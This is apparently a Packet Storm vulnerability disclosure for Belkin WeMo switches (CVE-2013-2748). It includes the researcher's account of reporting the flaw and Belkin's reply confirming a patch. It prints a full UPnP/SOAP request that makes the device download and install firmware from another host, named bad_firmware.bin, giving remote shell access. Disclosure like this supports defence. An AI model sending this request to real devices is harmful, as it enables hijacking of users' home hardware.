Belkin Wemo versions prior to WeMo_US_2.00.2176.PVT suffer from an arbitrary firmware upload vulnerability.
87ce1b406dd2592abb929c4664b6ec19f436813a9c618655fd04efa8165bac9d# Exploit Title: Belkin Wemo Arbitrary Firmware Vulnerability
# Date: 4/3/13
# Exploit Author: Daniel Buentello
# Vendor Homepage: http://www.belkin.com/us/wemo
# Version: Any version prior to WeMo_US_2.00.2176.PVT
# CVE : CVE-2013-2748
Hello
Im independently working with Mitre and Belkin on this matter so please
disregard my naiveness. Several months ago I discovered a vulnerablility on
the Belkin WeMo light switch would allow arbitrary firmware to uploaded
resulting in remote shell access.
Here is a youtube link to a PoC video I made:
https://www.youtube.com/watch?v=BcW2q0aHOFo
I was finally able to reach Belkin and worked with them on patching the
vulnerability. I recently heard back from them and here is the
correspondence:
Daniel,
The FW for WeMo Switch and Sensor with the security fixes for some of the
issues you notified us about have shipped. The updated FW version is
WeMo_US_2.00.2176.PVT and WeMo_WW_2.00.2176.PVT (worldwide version). I
didn't register for CVE's for the vulns you found, as the process wasn't
clear for companies outside tier 1 (Microsoft, Oracle, Apple, Adobe) type
companies. We are still working on a credit page for White Hat submissions
and it will probably be a few months out.
I reached out to Mitre and they assigned me a CVE and recommended I submit
my code here. Here is the code which would allow someone to upload their
own firmware:
POST /upnp/control/firmwareupdate1 HTTP/1.1
SOAPACTION: "urn:Belkin:service:firmwareupdate:1#UpdateFirmware"
Content-Length:
Content-Type: text/xml; charset="utf-8"
HOST: 10.0.1.8:49153
User-Agent:
<?xml version="1.0" encoding="utf-8"?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"
s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body>
<u:UpdateFirmware xmlns:u="urn:Belkin:service:firmwareupdate:1">
<ReleaseDate>07Jan2013</ReleaseDate><NewFirmwareVersion>1</NewFirmwareVersion><URL>
http://10.0.1.99/bad_firmware.bin<http://10.0.1.99/WeMo_US_2.00.1821.PVT_SNS.bin.gpg%3C/URL%3E%3CSignature%3Ea053469a3efe2bd5e396104ac1ef5b0e%3C/Signature%3E>
</u:UpdateFirmware>
</s:Body>
</s:Envelope>
Mitre needs the vulnerability documented on an external site in order to
add the entry into the CVE database. If needed I can forward you the PGP
signed message from them. If you need anything else feel free to ask. I
have copies of all correspondence between Belkin., Mitre, and myself.
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed